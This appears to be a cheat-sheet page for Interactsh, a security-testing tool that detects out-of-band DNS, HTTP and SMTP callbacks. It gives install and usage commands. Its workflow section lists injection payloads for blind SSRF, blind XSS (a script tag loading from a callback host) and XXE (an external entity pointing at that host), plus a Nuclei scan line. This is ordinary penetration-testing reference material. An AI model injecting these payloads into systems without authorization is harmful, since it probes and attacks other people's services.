Description
Interactsh is an open-source tool for detecting out-of-band (OOB) interactions. It's used to confirm blind vulnerabilities like SSRF, blind XSS, blind SQLi, and XXE by providing a unique interaction URL that logs DNS, HTTP, and SMTP callbacks.
Installation
BASH
# Using Go
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
# Homebrew
brew install interactsh
# Self-hosted server
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latestBasic Usage
BASH
# Generate unique OOB URLs
interactsh-client
# The tool outputs a unique URL like:
# [INF] Listing 1 payload for OOB Testing
# [INF] abc123.oast.fun
# Use this URL in your payloads to detect blind vulnsAdvanced Usage
BASH
# Custom token count
interactsh-client -n 5
# Persistent session
interactsh-client -s interactsh.com -token YOUR_TOKEN
# Filter by protocol
interactsh-client -dns-only
interactsh-client -http-only
# JSON output
interactsh-client -json
# Self-hosted server
interactsh-server -domain oast.yourdomain.com -ip YOUR_IPCommon Workflows
BASH
# Blind SSRF testing
# 1. Generate URL with interactsh-client
# 2. Inject into URL parameters: https://target.com/fetch?url=http://abc123.oast.fun
# 3. Watch interactsh-client for DNS/HTTP callbacks
# Blind XSS
# Inject: <script src="http://abc123.oast.fun/x"></script>
# Blind XXE
# Inject: <!ENTITY xxe SYSTEM "http://abc123.oast.fun/xxe">
# With Nuclei
nuclei -u https://target.com -iserver interactsh.com